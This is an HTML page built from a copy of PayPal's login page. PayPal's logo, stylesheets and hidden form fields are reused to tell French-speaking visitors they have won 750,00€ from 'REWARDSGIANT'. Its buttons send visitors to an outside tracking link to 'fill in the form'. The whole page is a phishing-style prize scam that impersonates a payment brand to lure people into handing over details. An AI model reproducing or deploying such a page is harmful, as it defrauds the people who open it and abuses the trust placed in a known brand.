<!DOCTYPE html>
<html lang="en"><!--<![endif]-->
  <head>
    <!--Script info: script: node, template:  , date: Nov 21, 2022 01:40:18 -08:00, country: TW, language: en web version:  content version:  hostname : rZJvnqaaQhLn/nmWT8cSUm+72VQ7inHLmNSWW7oQxSqkM7CaNNY3vwwDZDVc+NwN rlogid : rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfVANbpv53MZEySepZVSpTWRYJ8c9hOdmTcn%2BHSxZ2SMb_184998f5480 -->
    <meta charset="utf-8">
    <title>Vous avez gagné avec REAWARDSGIANT</title>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta name="application-name" content="PayPal">
    <meta name="msapplication-task" content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
    <meta name="msapplication-task" content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&amp;send_method=domestic;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
    <meta name="keywords" content="transfer money, email money transfer, international money transfer ">
    <meta name="description" content="Transfer money online in seconds with PayPal money transfer. All you need is an email address.">
    <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=2, user-scalable=yes">
    <meta property="og:image" content="https://www.paypalobjects.com/webstatic/icon/pp258.png">
    <link rel="stylesheet" href="https://www.paypalobjects.com/web/res/814/0ed5dab5e678c14296dd49b2a68b4/css/contextualLoginElementalUIv2.css">
    <style>/** method responsible for loading the background image set in CSS **/
	
    #btnLogin a{color :white;
	text-decoration: none;}
	
	#headerText{
    margin-bottom: 30px;
}

    #content{
	border: 5px solid #eaeced;
	margin: 120px 20px 0;
	margin-bottom: 120px;
	margin-top: 50px}
	
	
@-webkit-keyframes rotation {
  from {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -webkit-transform: rotate(359deg);
    transform: rotate(359deg);
  }
}
@-moz-keyframes rotation {
  from {
    -moz-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -moz-transform: rotate(359deg);
    transform: rotate(359deg);
  }
}
@-o-keyframes rotation {
  from {
    -o-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -o-transform: rotate(359deg);
    transform: rotate(359deg);
  }
}
@keyframes rotation {
  from {
    transform: rotate(0deg);
  }
  to {
    transform: rotate(359deg);
  }
}
.country-selector .country {
  overflow: hidden;
  height: 24px;
  min-width: 32px;
  background: transparent url(https://www.paypalobjects.com/webstatic/mktg/icons/sprite_countries_flag4.png) 5px 100px no-repeat;
  border: none;
  text-align: left;
}
.country-selector ul li {
  list-style: none;
  width: 19%;
  display: inline-block;
  line-height: 1.5rem;
  min-height: 3em;
}
.country-selector ul li a.country {
  padding: 3px 10px 0 35px;
  overflow: visible;
  line-height: 1.2em;
  display: block;
  height: 30px;
  min-width: 30px;
  color: #777;
  font-weight: 400;
  font-size: .9375rem;
}
.country-selector .priorityCountries {
  border-bottom: 1px solid #cfcfcf;
  margin-bottom: 20px;
}


.country-selector .FR,
.country-selector .france,
.country-selector .frenchguiana,
.country-selector .GF,
.country-selector .GP,
.country-selector .guadeloupe,
.country-selector .RE,
.country-selector .reunion {
  background-position: 5px -4374px;

}
@media all and (max-width: 767px) {
  .country-selector ul li {
    display: block;
    width: 100%;
  }
  .priorityCountries span::before {
    font-size: 3em;
    float: right;
    padding-right: 10px;
  }
}
ul.priorityCountries li:first-child a:visited,
ul.priorityCountries li:first-child a:hover {
  text-decoration: none;
}
@media all and (min-width: 768px) {
  .priorityCountries span::before {
    content: none;
  }
}
.countryListModal {
  position: absolute;
  top: 100%;
  transition: all 0.3s ease-out;
  min-height: 100vh;
  min-width: 100vw;
  background: #ffffff;
  z-index: 999999;
  opacity: 1;
}
.countryListModal.transitionUp {
  top: 0;
}
.countryListModal .wrapper {
  margin: 0 auto;
  width: 70%;
}
@media all and (max-width: 767px) {
  .countryListModal .wrapper {
    width: 100%;
  }
}
.countryListModal .buttonHolder {
  min-height: 7rem;
  position: fixed;
  width: 70%;
}
.countryListModal .ghostElement {
  /* hides behind fixed button holder */
  height: 7rem;
}
.countryListModal .modalContent {
  padding-left: 10px;
}
@media all and (max-width: 767px) {
  .countryListModal .buttonHolder {
    min-height: 5rem;
    width: 100%;
  }
  .countryListModal .ghostElement {
    height: 5rem;
  }
  .countryListModal .closeModal::before {
    /* to align with the selector icon */
    padding-right: 20px;
  }
}
.countryListModal .closeModal {
  background: none;
  border: none;
  padding: 0 4px 0;
  float: right;
  color: #2c2e2f;
  cursor: pointer;
  height: 40px;
  font-size: 2em;
}
.countryListModal .paypalIcon {
  background: url(https://www.paypalobjects.com/webstatic/i/consumer/onboarding/icon_PP_monogram_2x.png) center 14px no-repeat #ffffff;
  background-size: 20px;
}
.picker.country-selector {
  display: inline-block;
  vertical-align: middle;
  position: relative;
}
.picker.country-selector button {
  display: inline-block;
  margin-right: 30px;
  cursor: pointer;
  }
  
    .cartIcon {
    display: inline-block; 
    width: 50px; 
    height: 50px; 
    background: url('https://pic.onlinewebfonts.com/thumbnails/icons_354625.svg') no-repeat center center;
    background-size: cover; 
  
}
.picker.country-selector button::after {
  content: '';
  position: absolute;
  bottom: 10px;
  height: 8px;
  width: 8px;
  left: 30px;
  margin: 8px 0 0 8px;
  border-color: #333;
  border-image: none;
  border-style: solid;
  border-width: 1px 1px 0 0;
  -webkit-transform: rotate(135deg);
  -moz-transform: rotate(135deg);
  -o-transform: rotate(135deg);
  -ms-transform: rotate(135deg);
  transform: rotate(135deg);
}
</style>
  </head><body class="desktop" data-rlogid="rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfVANbpv53MZEySepZVSpTWRYJ8c9hOdmTcn%2BHSxZ2SMb_184998f5480" data-hostname="rZJvnqaaQhLn/nmWT8cSUm+72VQ7inHLmNSWW7oQxSqkM7CaNNY3vwwDZDVc+NwN" data-production="true" data-enable-ads-captcha="true" data-ads-challenge-url="/auth/createchallenge/3a683b092239e6c4/challenge.js" data-enable-client-cal-logging="true" data-correlation-id="f648376aa4f45" data-enable-fn-beacon-on-web-views="true" data-phone-password-enabled="true" data-is-hybrid-login-experience="true" data-is-hybrid-editable-on-cookied="true" data-phone-code="TW +886" data-csrf-token="7WFjRrsqbwhgISwG26S7F7nw277oujIgWiv4w=" data-nonce="8W5+8g/XL2b+uZ3YneCvf78kyJH6psLgclu6PZVHWva1RFjO" data-lazy-load-country-codes="true" data-party-id-hash="920eafc0b648a8127179afe8904bd221a21368116839603f85c8b9d420391d41" data-show-country-drop-down="true" data-otp-login-on-pwd-page-enabled="true" data-otp-login-eligible="true" data-otp-login-integration-type="via_button" data-email-label="Email address" data-xhr-timeout-limit="20000" data-load-start-time="1669023618176" data-is-cookied-user="true" data-xhr-timeout-ineligible-list="MSIE 10|Windows NT 10" data-otp-cookied-auto-send="true" data-otp-variant="autoSendOtp" data-show-try-another-way="true">
    <noscript>
      <p class="nonjsAlert" role="alert"></p>
    </noscript>
	
    <div id="main" class="main" role="main">
      <section id="login" class="login   " data-role="page" data-title="Log in to your PayPal account">
        <div class="corral">
          <div id="content" class="contentContainer   activeContent contentContainerBordered contentContainerBordered">
            <header id="header" class="logo-with-cart">
              <p role="img" aria-label="PayPal Logo" class="paypal-logo paypal-logo-long"></p>
              <span class="cartWrapper">
                <span class="cart">
                  <span class="cartIcon"></span>
                </span>
              </span>
            </header>
            <h1 id="headerText" class="headerText  headerTextWithoutSeparator">Vous avez gagné 750,00€ de REWARDSGIANT : </h1>
            <p id="pwdSubTagLine" class="subHeaderText ">Merci de remplir le formulaire pour bénéficier</p>
            <div class="notifications"></div>
            <div id="keychainErrorMessage" class="hide">
            </div>
            <form action="/signin?intent=checkout&amp;ctxId=xo_ctx_3WE90802EU513441D&amp;returnUri=%2Fwebapps%2Fhermes&amp;state=%3Fflow%3D1-P%26ulReturn%3Dtrue%26token%3D3WE90802EU513441D%26useraction%3Dcommit%26rm%3D2%26mfid%3D1669023463964_f8023377eed03%26rcache%3D1%26cookieBannerVariant%3D1%26targetService4174%3Dhermesnodeweb&amp;flowId=3WE90802EU513441D&amp;country.x=TW&amp;locale.x=en_US" method="post" class="proceed maskable" autocomplete="off" name="login" novalidate="">
              <input type="hidden" id="token" name="_csrf" value="7WFjRrsqbwhgISwG26S7F7nw277oujIgWiv4w=">
              <input type="hidden" id="session" name="_sessionID" value="W4hr4Ml21QLr6LA16zuBgcrRJ4xRv-jc">
              <input type="hidden" name="locale.x" value="en_US">
              <input type="hidden" name="processSignin" value="main">
              <input type="hidden" name="legalCountry" value="CA">
              <input type="hidden" name="fn_sync_data" value="fn_sync_data">
              <input type="hidden" name="otpMayflyKey" value="2520bbcd182f47d7b898f23451a21e98otpChlg">
              <input type="hidden" name="intent" value="checkout">
              <input type="hidden" name="ads-client-context" value="checkout">
              <input type="hidden" name="flowId" value="3WE90802EU513441D">
              <input type="hidden" name="ads-client-context-data" value="{&quot;context_id&quot;:{&quot;context_id&quot;:&quot;3WE90802EU513441D&quot;,&quot;channel&quot;:0,&quot;flow_type&quot;:&quot;checkout&quot;}}">
              <input type="hidden" name="ctxId" value="xo_ctx_3WE90802EU513441D">
              <input type="hidden" name="isValidCtxId" value="true">
              <input type="hidden" name="coBrand" value="tw">
              <input type="hidden" name="signUpEndPoint" value="/webapps/mpp/account-selection">
              <input type="hidden" name="langTgl" value="en">
              <input type="hidden" name="showCountryDropDown" value="true">
              <input type="hidden" name="hideOtpLoginCredentials" value="true">
              <input type="hidden" name="requestUrl" value="/signin?intent=checkout&amp;ctxId=xo_ctx_3WE90802EU513441D&amp;returnUri=%2Fwebapps%2Fhermes&amp;state=%3Fflow%3D1-P%26ulReturn%3Dtrue%26token%3D3WE90802EU513441D%26useraction%3Dcommit%26rm%3D2%26mfid%3D1669023463964_f8023377eed03%26rcache%3D1%26cookieBannerVariant%3D1%26targetService4174%3Dhermesnodeweb&amp;flowId=3WE90802EU513441D&amp;country.x=TW&amp;locale.x=en_US">
              <input type="hidden" name="forcePhonePasswordOptIn" value="">
              <input type="hidden" name="returnUri" value="/webapps/hermes">
              <input type="hidden" name="state" value="?flow=1-P&amp;ulReturn=true&amp;token=3WE90802EU513441D&amp;useraction=commit&amp;rm=2&amp;mfid=1669023463964_f8023377eed03&amp;rcache=1&amp;cookieBannerVariant=1&amp;targetService4174=hermesnodeweb">
              
              <input type="hidden" id="phone" name="login_phone" class="validate">
              <div class="actions">
                <button class="button actionContinue scTrack:unifiedlogin-login-submit"   id="btnLogin" name="btnLogin" pa-marked="1" ><a href="https://smrturl.co/o/509702/53199722?s1=" >Remplissez ce formulaire</a></button> 
              </div>
            
            <div id="signupContainer" data-hide-on-email="" data-hide-on-pass="">
              <div class="loginSignUpSeparator ">
                <span class="textInSeparator">ou</span>
              </div>
              <button type="button"  class="button secondary scTrack:unifiedlogin-click-signup-button" id="createAccount" pa-marked="1"><a href="https://smrturl.co/o/509702/53199722?s1=" >Contacter REWARDSGIANT</a></button> 
            <div class="intentFooter ">
              <div class="cancelUrl ">
                <a href="" data-url="" class="scTrack:unifiedlogin-click-cancel-and-return cancelLink" id="cancelLink" aria-hidden="false" pa-marked="1">Annuler et retourner vers votre boite Mail</a>
              </div>
              <div class="localeSelector  ">
               
                <ul class="localeLink">
                  <li>
                    <a class=" scTrack:unifiedlogin-footer-language_zh_TW" href="#" data-locale="zh_TW" pa-marked="1" lang="zh">Englais</a>
                  </li>
                  <li>
                      <a class="selected scTrack:unifiedlogin-footer-language_en_US" href="#" data-locale="en_US" aria-current="”true”" pa-marked="1" lang="en">français</a>
                  </li>
                </ul>
              </div>
            </div>
          </form></div>
        </div>
        
      
      <footer class="footer" role="contentinfo">
        <div class="legalFooter">
          <ul class="footerGroup">
            <li>
              <a target="_blank"  pa-marked="1">Contactez-Nous</a>
            </li>
            <li>
              <a target="_blank"  pa-marked="1">Confidentialité</a>
            </li>
            <li>
              <a target="_blank"  pa-marked="1">Légal</a>
            </li>
            <li>
              <a target="_blank"  pa-marked="1">Termes</a>
            </li>
            <li>
              <a target="_blank"  pa-marked="1">International</a>
            </li>
          </ul>
        </div>
      </footer>
    </div>
    
    
    
 
</body>
</html>